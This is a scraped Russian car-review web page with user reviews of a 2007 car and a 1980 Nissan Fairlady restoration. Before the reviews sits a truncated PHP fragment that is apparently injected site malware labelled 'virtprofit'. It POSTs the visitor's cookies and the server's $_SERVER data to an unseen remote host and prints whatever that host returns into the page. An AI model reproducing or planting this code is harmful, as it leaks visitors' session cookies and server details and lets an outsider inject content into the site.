array("header"=>"User-Agent: PHP Modules virtprofit\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($virtprofit_result) echo $virtprofit_result; ?>

Присланные отзывы за неделю


Прислал: Глеб
Год: 2007
Эксплуатирую: 1 год
Отзыв:

О плюсах этого автомобиля наслышаны уже многие. Но что касается минусов, то о них можно будет узнать только непосредственно во время эксплуатации.
Минусы, о которых мы успели уже узнать:
- появление незначительной вибрации, была ликвидирована в процессе очередного ТО



Прислал: Филипп
Год: 1980
Эксплуатирую: 2 года
Отзыв:

Рассказов об авто Nissan Fairlady на нашем ресурсе нет, решил пополнить копилку очерков парой слов об этом автомобиле, сошедшем с конвейера в 80-м году. Нас с братом не один год занимала мысль покупки машины «выходного дня». Общая идея постепенно конкретизировалась в очень редкий четырехместный кабриолет без крыши – эксплуатация предполагалась в летний период, для эффектных прогулок по набережной.
Машина Ниссан Файрледи нашлась, хотя ее шикарный вид скрывал толстый слой грязи и пыли. Пятилитровый 300-сильный бензиновый агрегат оставалось только взбодрить – тяга, как у паровоза, начиная с малых оборотов.
Так как Файрледи пережила на своем веку многое, работы с ней - непочатый край, основным проблемным местом в ней была подвеска, состояние ее было крайне запущенным. Стойки - «убиты», ступицы переоборудованы под сверловку. Тормоза – не в лучшем состоянии: передние суппорты установлены от «неопознанного» автомобиля, заглушена тормозная задняя магистраль. Получаем удовольствие от ухода за Файрледи и мероприятий, на которые на ней приезжаем.
"



Return to Top ▲НА ВЕРХ ▲